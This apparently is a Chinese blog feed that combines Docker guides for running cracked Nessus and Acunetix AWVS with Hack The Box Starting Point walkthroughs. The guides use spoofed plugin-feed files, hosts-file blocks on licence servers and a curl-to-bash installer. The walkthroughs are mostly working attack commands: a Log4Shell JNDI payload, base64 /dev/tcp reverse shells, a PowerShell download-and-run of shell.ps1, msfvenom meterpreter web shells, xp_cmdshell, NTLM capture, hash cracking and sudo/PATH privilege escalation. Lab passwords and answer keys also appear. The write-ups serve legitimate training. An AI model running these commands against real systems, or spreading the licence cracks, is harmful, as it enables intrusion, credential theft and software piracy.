官方提供docker版本的Nessus镜像,但是没有插件 https://docs.tenable.com/nessus/Content/DeployNessusDocker.htm

docker pull tenableofficial/nessus

所以自己把插件添加进去, 在docker容器启动以后,运行下crack.sh, 就可以使用插件了

Nessus 下载地址

https://www.tenable.com/downloads/nessus

扫描漏洞模块下载地址

https://plugins.nessus.org/v2/nessus.php?f=all-2.0.tar.gz&u=4e2abfd83a40e2012ebf6537ade2f207&p=29a34e24fc12d3f5fdfbb1ae948972c6

镜像制作步骤

拉取debian镜像,添加文件, 安装nessus
打包上传docker hub
使用
删除

1. 拉取Debian镜像,并添加文件, 安装nessus

拉取debian镜像

docker -d run -it --name nessus-init  -p 8834:8834 debian bash

添加文件

# 这里的文件名根据实际情况修改
docker cp Nessus-10.5.0-debian10_amd64.deb nessus-init:/opt/
docker cp all-2.0.tar.gz nessus-init:/opt/
docker cp crack.sh nessus-init:/opt/

crack.sh 内容

#!/bin/bash

/etc/init.d/nessusd stop
/opt/nessus/sbin/nessuscli update /opt/all-2.0.tar.gz

cat >> /opt/nessus/var/nessus/plugin_feed_info.inc <<"EOF"
PLUGIN_SET = "202303110605";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";
EOF

参考 https://www.iculture.cc/software/pig=25546

我省略了PLUGIN_SET获取过程, 直接手工指定

安装

dpkg -i Nessus-10.5.0-debian10_amd64.deb

安装好以后,访问对应IP的8834端口进行安装操作

2. 打包镜像上传

有人会问为什么这里不先运行破解crack.sh后再打包, 因为权限问题! docker 无法保存使用 chattr +i 修改了权限的文件,所以选择在容器运行阶段进行解压和权限设置

打包

docker commit nessus-init dockerhub用户名/仓库名:tag名

#登陆,已登录过可忽略
docker login
    username:
    password:

#上传,使用上面coomit处创建的
docker push dockerhub用户名/仓库名:tag名

3. 使用

我们使用 --cap-add LINUX_IMMUTABLE 来进行权限设置

拉取镜像

docker run -d -it --name nessus --cap-add LINUX_IMMUTABLE -p 8834:8834  k9scc/nessus:v202303110605 bash

#登陆进 docker容器
docker exec -it nessus bash

导入插件和许可

#登陆进容器以后执行下面的命令
bash /opt/crack.sh

这个时候等一会就好了, 大约十分钟左右, 访问8834端口, 即可, 默认用户名 admin 密码 admin

Nessus-images-0

4. 删除

因为使用了 --cap-add LINUX_IMMUTABLE 权限, 删除容器的时候会提示失败, 我们需要取消对应文件的 锁定 权限即可

Nessus-images-1

例如,上图的地址为

/var/lib/docker/overlay2/58cf5fc21037833de45ff6406a37d26a0cb10ef81df999a39a97f79e32db7bba/diff/opt/nessus/var/nessus/plugin_feed_info.inc

chattr -i /var/lib/docker/overlay2/58cf5fc21037833de45ff6406a37d26a0cb10ef81df999a39a97f79e32db7bba/diff/opt/nessus/var/nessus/plugin_feed_info.inc

插件目录,批量取消锁定权

chattr -i -R /var/lib/docker/overlay2/c9df7514dedca1c5f230dd01d99016720986d2eb0195cd6c542aebe4b95da79e/diff/opt/nessus/lib/nessus/plugins/

每次新创建的docker, docker路径都是不一样的,docker 文件映射的主机路径为 Uppdir里面的路径,使用 inspect可以查看

docker inspect nessus

Nessus-images-2

Linux一键安装

环境

OS: debian11
Nessus: 10.5.0
Plugins: 202303071847

直接使用

curl -k https://www.hao.kim/soft/nessus-install.txt | bash

其他系统的ness可以到这里下载 https://www.tenable.com/downloads/nessus 这里为 debian11, 其他系统对应脚本的4-5行内容进行修改

Nessus-images-3

如果没有安装 curl,dpkg 的安装一下

#debian/Ubuntu
apt install curl dpkg -y

#Rhel Centos
yum -y install curl dpkg -y

ness-install.sh

#!/bin/bash
/etc/init.d/nessusd stop

curl --request GET \
  --url 'https://www.tenable.com/downloads/api/v2/pages/nessus/files/Nessus-10.5.0-debian10_amd64.deb' \
  --output 'Nessus.deb'

dpkg -i Nessus.deb  && rm -rf Nessus.deb

curl -A Mozilla -o all-2.0.tar.gz \
  --url 'https://plugins.nessus.org/v2/nessus.php?f=all-2.0.tar.gz&amp;u=4e2abfd83a40e2012ebf6537ade2f207&amp;p=29a34e24fc12d3f5fdfbb1ae948972c6' &>/dev/null
#curl -A Mozilla -o all-2.0.tar.gz --url 'https://www.hao.kim/soft/all-2.0.tar.gz 如果国内下载慢可以使用我下载的, 每天更新

chattr -i -R /opt/nessus/lib/nessus/plugins/
chattr -i /opt/nessus/var/nessus/plugin_feed_info.inc
/opt/nessus/sbin/nessuscli update all-2.0.tar.gz && rm -rf update all-2.0.tar.gz

vernum=$(curl https://plugins.nessus.org/v2/plugins.php 2> /dev/null)

cat > /opt/nessus/var/nessus/plugin_feed_info.inc <<"EOF"
PLUGIN_SET = "${vernum}";
PLUGIN_FEED = "ProfessionalFeed (Direct)";
PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";
EOF

cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/lib/nessus/plugins/plugin_feed_info.inc
chattr +i /opt/nessus/var/nessus/plugin_feed_info.inc

chattr +i -R /opt/nessus/lib/nessus/plugins/ # 有的使用chattr +i -R 提示行数太多报错的话,用下面一行
#find /opt/nessus/lib/nessus/plugins/ -type f -exec chattr +i {} \; 

chattr -i /opt/nessus/lib/nessus/plugins/plugin_feed_info.inc

#systemd方式
#/bin/systemctl start nessusd.service

/etc/init.d/nessusd start

参考 https://www.iculture.cc/software/pig=25546

]]> docker Nessus 手把手构建AWVS的docker镜像 /archives/docker/awvs-images.html 大致分为下面几个步骤

拉取debian基础镜像, 安装基础环境
添加awvs 和 license 到镜像, 并进行初始安装
构建镜像,并上传docker hub

使用镜像创建 awvs 容器

docker run -d -it  --cap-add LINUX_IMMUTABLE -p 3443:3443 --name awvs k9scc/awvs:v15.4 /bin/bash /opt/awvs/start.sh

删除容器

1. 创建基础镜像

Dockerfile

FROM debian
RUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list &&\
    apt update &&\
    apt -y install net-tools libx11-6 libxcomposite1 libxdamage1 libxext-dev libxfixes-dev libxrandr-dev libasound2 libatk-adaptor libatk-bridge2.0-0 libatk-bridge2.0-dev libatspi2.0-0 libcairo2 libcups2 libdbus-1-3 libdrm2 libexpat1 libgbm1 libgio-cil libglib2.0-0 libglib-perl librust-gobject-sys-dev libnspr4 libnss3 libpango-1.0-0 libxkbcommon0 sudo systemctl

构建包含基础环境镜像

docker build -t debian-env  .

#查看构建好的镜像
docker images

awvs-images-0

2. 使用上面的镜像创建一个容器, 并且把应用添加到镜像

安装awvs, app文件夹里面存放awvs安装文件和license文件

docker run -it --name awvs-init debian-env bash

#另外打开一个终端
docker cp app awvs-init:/opt/awvs

安装awvs, 此时安装好后时未激活状态

安装步骤

1. >>> 回车

2. ---More--- q #按键盘q

3. Accept the license terms? [yes|no]
[no] >>> yes #输入yes

4. Hostname [a366*****23]: awvs #随便输

5 Configuring the master user...
    Email: admin@admin.com  #登陆邮箱
    Password:               #密码
    Password again:         #密码

awvs-images-1

清理

apt clean all
cd /opt/awvs
rm acunetix_15.4.230222085_x64.sh install.log

3. 构建镜像, 并上传到docker hub

构建镜像

docker commit awvs-init awvs:init

上传dockerhub

#登陆dockerhub
docker login
    username
    password

#打标签,然后上传镜像
docker tag awvs:init 用户名/仓库名:标签
docker push 用户名/仓库名:标签

4. 使用

创建容器

docker run -d -it  --cap-add LINUX_IMMUTABLE -p 3443:3443 --name awvs k9scc/awvs:v15.4 /bin/bash /opt/awvs/start.sh

这里使用了 --cap-add LINUX_IMMUTABLE是为了方便chattr命令锁定lisense文件

start.sh内容

add_entry_to_hosts () {
  local hostname=$1
    echo "Adding $hostname entry."
    echo -e "127.0.0.1  $hostname\n::1  $hostname" >> /etc/hosts
}
add_entry_to_hosts "erp.acunetix.com"
add_entry_to_hosts "telemetry.invicti.com"
add_entry_to_hosts "updates.acunetix.com"

su -l acunetix -c "/home/acunetix/.acunetix/start.sh"

第一次创建容器后的时候需要运行crack.sh

进入容器

docker exec -it awvs bash

#进入容器后
    cd /opt/awvs/
    bash start.sh

5. 删除容器

因为使用了特殊权限,删除会提示错误, chattr -i 取消对应路径的文件权限即可删除如图

awvs-images-2

提示

#docker rm awvs
Error response from daemon: container 2810520df0d51b693522e97d0328d01ddbc8abb5caf88576f8df83d1ae07451a: driver "overlay2" failed to remove root filesystem: unlinkat /var/lib/docker/overlay2/81b0d118aa36af991ffdee8e12d8a831df10653d73af7df3c195e92dd885afe6/diff/home/acunetix/.acunetix/data/license/license_info.json: operation not permitted

#路径为
/var/lib/docker/overlay2/81b0d118aa36af991ffdee8e12d8a831df10653d73af7df3c195e92dd885afe6/diff/home/acunetix/.acunetix/data/license/

docker rm awvs

#这里的路径改成自己的
 chattr -i /var/lib/docker/overlay2/81b0d118aa36af991ffdee8e12d8a831df10653d73af7df3c195e92dd885afe6/diff/home/acunetix/.acunetix/data/license/license_info.json
chattr -i /var/lib/docker/overlay2/81b0d118aa36af991ffdee8e12d8a831df10653d73af7df3c195e92dd885afe6/diff/home/acunetix/.acunetix/data/license/wa_data.dat

awvs-images-3

]]> docker awvs docker容器中使用chattr修改文件权限报错 "chattr Operation not permitted while setting flags on ***" /archives/docker/CAP_LINUX_IMMUTABLE.html docker中默认是禁止 CAP_LINUX_IMMUTABLE 的像chattr这些命令,是无法正常使用的, 如果使用 chattr +i file 会提示 chattr: Operation not permitted while setting flags on *** 要正常使用chattr等命令, 需要开启 CAP_LINUX_IMMUTABLE

docker run -it --cap-add LINUX_IMMUTABLE xxx

如果提示没有chattr命令,需要安装e2fsprogs

centos/redhat/archlinux

yum -y install e2fsprogs

debian/ubuntu

apt-get install e2fsprogs

]]> docker chattr CAP_LINUX_IMMUTABLE Hack The Box :: Starting Point - Unified /archives/security/HTB/start-Unified.html 扫描, 开放端口，22，6789，8443，8080

nmap -A 10.129.56.105 --open

start-Unified-1

访问`https://10.129.56.105:8443`

start-Unified-2

经过搜索发现漏洞为 `cve-2021-44228`

https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi

登录抓包

start-Unified-3

把post的包发到Repeater，tcpdump监听网卡389端口，ldap默认389，然后改包，发送，可以看到收到一个发往端口389的数据包

"remember":false,
#改为 ${jndi:ldap://本地IP地址}
"remember":"${jndi:ldap://10.10.16.130/o=tomcat}",

start-Unified-4

部署一个jndi

#安装编译环境并拉取项目编译
apt install maven -y
git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package

start-Unified-5

编写反弹命令并编码为base64

# echo 'bash -c bash -i >&/dev/tcp/反弹地址，这里是本地地址/端口 0>&1' | base64
 echo 'bash -c bash -i >&/dev/tcp/10.10.16.130/4444 0>&1' | base64

#YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTMwLzQ0NDQgMD4mMQo=

#运行jndi ，hostname后跟着反弹地址，这里是本地地址
java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTMwLzQ0NDQgMD4mMQo=
}|{base64,-d}|{bash,-i}" --hostname "10.10.16.130"

start-Unified-6

漏洞利用获取shell

本地监听端口 4444 ，为上面设置的，有可以设置为其他，需要和上面的对应

nc -lnvp 4444

burpsuite 改包 , 然后发送

"remember":"${jndi:ldap://10.10.16.130:1389/o=tomcat}",

收到反弹shell

start-Unified-7

切换bash终端

script /dev/null -c bash

unifi 配置文件 /usr/lib/unifi/data/system.properties

mongo端口

ps -ef | grep mongo

start-Unified-8

进入mongo ，并查看数据库

mongo --port 27117
show dbs

start-Unified-9

获取用户密码hash

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

start-Unified-10

密码为$6$ 可以通过hashcat进行破解，慢，成功几率小

hashcat -a 0 -m 1800 hash.txt 字典路径

hash.txt

$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.

修改用户密码

#生成一个hash值
mkpasswd -m sha-512 123456

#$6$2AIEYvn9N5FpSTI0$vViX7OcskP1wCUjrCgZoeoV31WNigJg00.Pln3nXVzdrU7v9DEzKp2EvYFeCu5iXs1Q1x1NicNkXZHi6YBMrH1

#修改hash
mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")}, {$set:{"x_shadow":"$6$2AIEYvn9N5FpSTI0$vViX7OcskP1wCUjrCgZoeoV31WNigJg00.Pln3nXVzdrU7v9DEzKp2EvYFeCu5iXs1Q1x1NicNkXZHi6YBMrH1"}})'

start-Unified-11

使用用户名 administrator密码 123456 登录 https://10.129.56.105:8443/manage/account/login?redirect=%2Fmanage 然后在 设置 -》 site -》device auth 可以看到密码 NotACrackablePassword4U2022

start-Unified-12

通过获取的root密码登录ssh ，获取flag

ssh root@10.129.56.105
    NotACrackablePassword4U2022
ls
cat root.txt

ls /home/michael
cat /home/michael/user.txt

start-Unified-13

除此之外还可以使用msf，一键getshell

msfconsole
use exploit/multi/http/ubiquiti_unifi_log4shell
set rhosts 10.129.23.127    #远程IP，unifi所在服务器IP
set lhost 10.10.16.130        #反弹IP ，这里是本地IP
set srvhost 10.10.16.130    #Jndi服务器IP，这里是本地IP，如果没有msf会创建一个jndi服务并开启389端口， 端口也可以改

run

start-Unified-14

Task 1 Which are the first four open ports? 开放了哪些端口
22,6789,8080,8443
Task 2 What is the title of the software that is running running on port 8443? 8443端口运行着什么软件
Unifi Network
Task 3 What is the version of the software that is running? 运行的软件版本是什么
6.4.54
Task 4 What is the CVE for the identified vulnerability? 漏洞编号是什么
cve-2021-44228
Task 5 What protocol does JNDI leverage in the injection? 使用什么协议注入
ldap
Task 6 What tool do we use to intercept the traffic, indicating the attack was successful? 我们使用什么工具拦截流量，表明攻击成功？
tcpdump
Task 7 What port do we need to inspect intercepted traffic for? 我们需要检查哪个端口拦截流量
389
Task 8 What port is the MongoDB service running on? mongoDB运行在哪个端口
27117
Task 9 What is the default database name for UniFi applications? UniFi 应用程序的默认数据库名称是什么
ace
Task 10 What is the function we use to enumerate users within the database in MongoDB? 我们使用什么函数来枚举 MongoDB 数据库中的用户
db.admin.find()
Task 11 What is the function we use to update users within the database in MongoDB? 我们使用什么函数来更新 MongoDB 数据库中的用户
db.admin.insert()
Task 12 What is the password for the root user? root用户的密码是多少
NotACrackablePassword4U2022

参考
https://www.sprocketsecurity.com/resources/another-log4j-on-the-fire-unifi
https://blog.csdn.net/zr1213159840/article/details/123697698
https://systemweakness.com/write-up-hack-the-box-starting-point-unified-tier-2-d4f3585320a1

]]> security HTB HTB Unified Hack The Box :: Starting Point - Vaccine /archives/security/HTB/start-Vaccine.html 老规矩，扫描

nmap -A  10.129.89.216 -v --open

start-Vaccine-1

ftp匿名登录，有个backup.zip文件，下载下来看下

start-Vaccine-2

backup.zip文件需要密码，使用john进行破解，获取到密码 `741852963`

zip2john backup.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --show hash

start-Vaccine-3

解压后，查看index.php发现登录是进行hash对比， hash值是cmd5加密，解密后得到 `qwerty789`

cat index.php

start-Vaccine-5

https://www.somd5.com/

start-Vaccine-6

用上面的信息访问下我们的网站

start-Vaccine-7

adminqwerty789 登录

start-Vaccine-8

搜索框有个搜索，尝试用sqlmap跑下看看有没有注入，同时需要带上phpsession的cookie

sqlmap -url "http://10.129.89.216/dashboard.php?search=1" --cookie="PHPSESSID=2drpkfp389uc4skergc81mqdqs" --os-shell
#直接用sqlmap写webshell，但是/var/www/html目录没有写入权限
sqlmap -url "http://10.129.178.244/dashboard.php?search=1" --cookie="PHPSESSID=88agokct14hpl4mgti1nboni8p" --file-write=reverse.php --file-dest=/var/www/html/reverse.php

可以看到通过sqlmap获取了一个os shell

start-Vaccine-9

获取一个远程tty，获取地一个flag，相对来说，反弹shell 我更喜欢用msf，当然获取用户名密码以后可以直接使用ssh登录

nc -lnvp 4444
bash -c "bash -i >& /dev/tcp/10.10.16.130/4444 0>&1"

python3 -c 'import pty;pty.spawn("/bin/bash")'

start-Vaccine-10
start-Vaccine-11
start-Vaccine-12
start-Vaccine-13

sudo -l看下哪些程序有特权,发现vi可以

sudo -l
P@s5w0rd!

start-Vaccine-14

提权

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

#在vi命令模式下输入
:!bash

start-Vaccine-15 start-Vaccine-16 start-Vaccine-17

Task 1 Besides SSH and HTTP, what other service is hosted on this box? 除了 SSH 和 HTTP，这个盒子上还有什么其他服务？
ftp
Task 2 This service can be configured to allow login with any password for specific username. What is that username? 此服务可以配置为允许使用特定用户名的任何密码登录。那个用户名是什么？
anonymous
Task 3 What is the name of the file downloaded over this service? 通过此服务下载的文件的名称是什么
backup.zip
Task 4 What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? John The Ripper 工具集附带什么脚本并以允许破解尝试的格式从受密码保护的 zip 存档生成哈希？
zip2john
Task 5 What is the password for the admin user on the website? 网站上admin用户的密码是多少？
qwerty789
Task 6 What option can be passed to sqlmap to try to get command execution via the sql injection? 可以将什么选项传递给 sqlmap 以尝试通过 sql 注入执行命令
--os-shell
Task 7 What program can the postgres user run as root using sudo? postgres 用户可以使用 sudo 作为 root 运行什么程序？
vi

]]> security HTB HTB Vaccine Hack The Box :: Starting Point - Oopsie /archives/security/HTB/start-Oopsie.html 扫描发现22，80开放

nmap -sV 10.129.114.125

start-Oopsie-1

访问web，发现`/cdn-cgi/login/`路径

start-Oopsie-2

另外爆破路径可以用gobuster，成功率取决与字典

gobuster dir -u  http://10.129.114.125 -w 字典路径

访问`http://10.129.114.125/cdn-cgi/login/` ，有个login as `guest`

start-Oopsie-3
start-Oopsie-4

页面Account url id=2，替换为1会是什么样呢

start-Oopsie-5
start-Oopsie-6

start-Oopsie-7

修改cookie值，role为admin， user为34322刷新，可以发现upload可以上传东西

start-Oopsie-8

也可以对登陆页面可以暴力破解，但是通过上面的绕过更方便

可以用burpsuite也可以用hydra 登录并查看请求信息

start-Oopsie-9

请求地址 http://10.129.114.125/cdn-cgi/login/index.php post的数据username=admin&password=1

hydra -l admin -P pass.txt -f 10.129.41.170 http-post-form "/cdn-cgi/login/index.php:username=^USER^&password=^PASS^:"

start-Oopsie-10

命令解释：

-l 用户名 -P 字典路径 http-post-form 通过post 表单提交数据 “/URL:username=^USER^&password=^PASS^:判断条件” 通过：分割，URL为请求地址， USER 和PASS分别为前面的参数，最后一个为判断条件

上传一个phpinfo但是没有回显路径，需要查找或者爆破一下目录

start-Oopsie-11

注意到路径有一个uploads，尝试访问看看 http://10.129.114.125/uploads/ 路径存在

start-Oopsie-12

shell脚本，可以用weevely ，或者用msf ，或者哥斯拉看个人喜好 http://10.129.114.125/uploads/infoinfo.php

start-Oopsie-13

下面演示使用msfconsole进行

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.16.130
run -j

start-Oopsie-14

另开一个终端生成一个webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.16.130 lport=4444 -f raw > reverse.php

start-Oopsie-15

上传刚刚生成的reverse.php，然后访问 http://10.129.114.125/uploads/reverse.php msf会收到一个shell

start-Oopsie-16

session 1

在/cdn-cgi/login/db.php目录找到数据库连接的相关信息

start-Oopsie-17

获取一个tty终端，使用python，因为开放了22端口，可以直接使用ssh

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

    su robert
    M3g4C0rpUs3r!  #密码
    cd
    ls
    cat user.txt

start-Oopsie-18
start-Oopsie-19

查看用户id，发现所属两个组

id

start-Oopsie-20

查找存在suid的文件

find / -perm -u=s -type f 2>/dev/null

文件会从root目录读取文件

start-Oopsie-21

提权，通过改变cat的环境变量，来进行，

echo $PATH
export PATH=/tmp:$PATH
echo '/bin/bash' > cat
chmod +x cat
/usr/bin/bugtracker
    1
    whoami
    ls /root/
    tail /root/root.txt
    tail /home/robert/user.txt

start-Oopsie-22

获取flag ，使用tail ，head ，more，vi， vim 等查看

start-Oopsie-23

TASK 1 With what kind of tool can intercept web traffic? 用什么样的工具可以拦截网络流量？
proxy
TASK 2 What is the path to the directory on the webserver that returns a login page? 网络服务器上返回登录页面的目录的路径是什么？
/cdn-cgi/login
TASK 3 What can be modified in Firefox to get access to the upload page? 在Firefox中可以修改什么以获得对上传页面的访问？
cookie
TASK 4 What is the access ID of the admin user? 什么是管理员用户的访问ID？
34322
TASK 5 On uploading a file, what directory does that file appear in on the server? 在上传文件时，该文件会出现在服务器的哪个目录中？
/uploads
TASK 6 What is the file that contains the password that is shared with the robert user? 包含与robert用户共享的密码的文件是什么？
db.php
TASK 7 What executible is run with the option “-group bugtracker” to identify all files owned by the bugtracker group? 使用选项”-group bugtracker “运行什么可执行文件，以确定bugtracker组所拥有的所有文件？
find
TASK 8 Regardless of which user starts running the bugtracker executable, what’s user privileges will use to run? 无论哪个用户开始运行bugtracker可执行文件，都会使用什么用户权限来运行？
root
TASK 9 What SUID stands for? SUID代表什么?
set owner user id
TASK 10 What is the name of the executable being called in an insecure manner? 正在以不安全的方式调用的可执行文件的名称是什么？
cat

]]> security HTB HTB Oopsie Hack The Box :: Starting Point - Archetype /archives/security/HTB/start-Archetype.html 扫描

nmap 10.129.95.187 -sV

start-Archetype-1

查看smb共享目录

smbclient -L 10.129.95.187

start-Archetype-2

获取共享文件，看到用户名 ARCHETYPE\sql_svc 密码M3g4c0rp123

smbclient \\\\10.129.95.187\\backups
    ls
    get prod.dtsConfig

start-Archetype-3

使用smbclient.py进行数据库连接，也可以用sqlmap，sqlmap更方便一些

https://github.com/fortra/impacket

#msclient
python mssqlclient.py sql_svc@10.129.95.187 -windows-auth
#sqlmap
sqlmap -d "mssql://ARCHETYPE\\sql_svc:M3g4c0rp123@10.129.95.187:1433/" --os-shell

start-Archetype-4

使用sql命令开启xp_cmdshell执行系统命令效果和sqlmap的一样，二选一即可

enable_xp_cmdshell
RECONFIGURE

#查看当前权限
xp_cmdshell whoami

#检查是否有管理权限
SELECT IS_SRVROLEMEMBER ('sysadmin')

# 获取反弹shell，可以用powershell远程执行ps1或者msiexec安装,或者msf的exe
# xp_cmdshell后面跟要运行的命令即可
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.11:8080/shell.ps1\");"

# 或者
xp_cmdshell "msiexec -qa http://10.10.16.130 /shell.msi"

获取信息，一般查看桌面和历史命令user.txt

dir c:\users\sql_svc\desktop\
type c:\users\sql_svc\desktop\user.txt

start-Archetype-5

Winpeas，下载后执行，会进行扫描然后给出提示

https://github.com/carlospolop/PEASS-ng

./winPEASx64.exe

start-Archetype-6

历史命令，通过Winpeas查看到，路径 `C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine`

dir  C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine\ConsoleHost_history.txt

start-Archetype-7

上面获取到了administrato的密码，可以使用msf通过smb获取flag，或者用 impacket 里面的psexec.py有可以

msfconsle

msfconsole
use exploit/windows/smb/psexec
set lhost 10.10.16.130 #本地IP
set rhosts 10.129.95.187 #远程IP
set smbuser administrator
set smbpass MEGACORP_4dm1n!!
option #检查设置是否正确
run #执行获取shell
cat c:\users\administrator\desktop\root.txt

start-Archetype-8

方法2 psexec.py

python psexec.py administrator@10.129.95.187
MEGACORP_4dm1n!!  #密码

Task 1 Which TCP port is hosting a database server?
1433
Task 2 What is the name of the non-Administrative share available over SMB?
backups
Task 3 What is the password identified in the file on the SMB share?
M3g4c0rp123
Task 4 What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?
mssqlclient.py
mssqlclient.py https://github.com/SecureAuthCorp/impacket.git
Task 5 What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?
xp_cmdshell
Task 6 What script can be used in order to search possible paths to escalate privileges on Windows hosts?
Winpeas
Task 7 What file contains the administrator’s password?
ConsoleHost_history.txt

]]> security HTB HTB Archetype Hack The Box :: Starting Point - Three /archives/security/HTB/start-Three.html 扫描

nmap -T4 -Pn -sVC -p- 10.129.27.183

开放端口22， 80 访问80 http://10.129.27.183/#contact 找到联系方式 thetoppers.htb

start-Three-1

根据提示写入域名到hosts，然后爆破子域名

echo "10.129.27.183 thetoppers.htb" >> /etc/hosts
gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ #耐何没有爆破出来
echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts

一开始题目提示是 `s3.thetoppers.htb`

start-Three-2

安装AWS客户端

apt install awscli -y
aws configure  # 配置

start-Three-3

上传shell

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb  #列文件 发现是index.php首页生成php一句话 ，也可以用蚁剑，哥斯拉等工具
echo '' > shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb  #上传文件

执行命令

http://thetoppers.htb/shell.php?cmd=ls

start-Three-4

http://thetoppers.htb/shell.php?cmd=ls ../

start-Three-7

http://thetoppers.htb/shell.php?cmd=cat ../flag.txt

start-Three-6

Task 1 How many TCP ports are open?
2
Task 2 What is the domain of the email address provided in the “Contact” section of the website?

thetoppers.htb

Task 3 In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
/etc/hosts
Task 4 Which sub-domain is discovered during further enumeration?
s3.thetoppers.htb
Task 5 Which service is running on the discovered sub-domain?
Amazon S3
Task 6 Which command line utility can be used to interact with the service running on the discovered sub-domain?
awscli
Task 7 Which command is used to set up the AWS CLI installation?
aws configure
Task 8 What is the command used by the above utility to list all of the S3 buckets?
aws s3 ls
Task 9 This server is configured to run files written in what web scripting language?
php

]]> security HTB HTB Three Hack The Box :: Starting Point - Responder /archives/security/HTB/start-Responder.html 端口扫描，发现端口80，直接访问跳转到 unika.htb

nmap 10.129.216.188
nmap 10.129.216.188 -A -p 80 -Pn

修改本地host文件,之后直接访问域名

echo "10.129.216.188 unika.htb"  >> /etc/hosts

可以看到版本语言为php

start-Responder-1

页面点击语言切换，提示在page参数存在本地文件包含

../../../../../../../../windows/system32/drivers/etc/hosts

start-Responder-2

//10.10.14.6/somefile

start-Responder-3

获取NTLM hash

修改http://unika.htb/index.php?page=//自己的IP地址/somefile

ip a # 比如我这里是10.10.16.130

抓包

responder -I tun0

start-Responder-4

把 hash值存入文件

vim hash.txt

hash.txt

Administrator::RESPONDER:776ede6a755707fe:95E2B1BB3B513F892ED5754D6B3E1C95:01010000000000008071B24EC84BD9014BA7BD9254BC57AD0000000002000800510031004D00530001001E00570049004E002D0054003000490036004D0056004F00340048005900580004003400570049004E002D0054003000490036004D0056004F0034004800590058002E00510031004D0053002E004C004F00430041004C0003001400510031004D0053002E004C004F00430041004C0005001400510031004D0053002E004C004F00430041004C00070008008071B24EC84BD90106000400020000000800300030000000000000000100000000200000BA91424F97B704CCFC81784E303224B6046043E70F8FAE2AB1BF5315099E0E840A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100330030000000000000000000

使用john破解

john hash.txt

start-Responder-5

一开始只扫描到了80端口，进行个全端口扫描，发现了5985

nmap -p- --min-rate 5000 10.129.216.188 --open -v

start-Responder-6

远程连接，IP为目标ip，在mike桌面找到flag

evil-winrm -i 10.129.216.188 -u administrator -p badminton

start-Responder-7

Task 1 When visiting the web service using the IP address, what is the domain that we are being redirected to?
unika.htb
Task 2 Which scripting language is being used on the server to generate webpages?
php
Task 3 What is the name of the URL parameter which is used to load different language versions of the webpage?
page
点击语言切换，url http://unika.htb/index.php?page=german.html 参数为page
Task 4 Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
../../../../../../../../windows/system32/drivers/etc/hosts
Task 5 Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
//10.10.14.6/somefile
Task 6 What does NTLM stand for?
New Technology LAN Manager
Task 7 Which flag do we use in the Responder utility to specify the network interface?
-I
Task 8 There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.
john the ripper
Task 9 What is the password for the administrator user?
badminton
Task 10 We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
5985

]]> security HTB HTB Responder Hack The Box :: Starting Point - Crocodile /archives/security/HTB/start-Crocodile.html 端口扫描

nmap 10.129.171.69
nmap 10.129.171.69 -A -p 21,80

start-Crocodile-1

允许匿名用户登录，并且存在两个文件

ftp 10.129.171.69
    Anonymous #登录
    ls     #列出目录
    get allowed.userlist
    get allowed.userlist.passwd
    exit

cat allowed.userlist
cat allowed.userlist.passwd

start-Crocodile-2

浏览80端口

start-Crocodile-4

爆破路径

gobuster dir -u 10.129.171.69 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -x .php

start-Crocodile-5

用上面文件的信息登录下,获得flag

start-Crocodile-6
start-Crocodile-7

Task 1 What Nmap scanning switch employs the use of default scripts during a scan?
-sC
Task 2 What service version is found to be running on port 21?
vsftpd 3.0.3
Task 3 What FTP code is returned to us for the “Anonymous FTP login allowed” message?
230
Task 4 After connecting to the FTP server using the ftp client, what username do we provide when prompted to log in anonymously?
Anonymous
Task 5 After connecting to the FTP server anonymously, what command can we use to download the files we find on the FTP server?
get
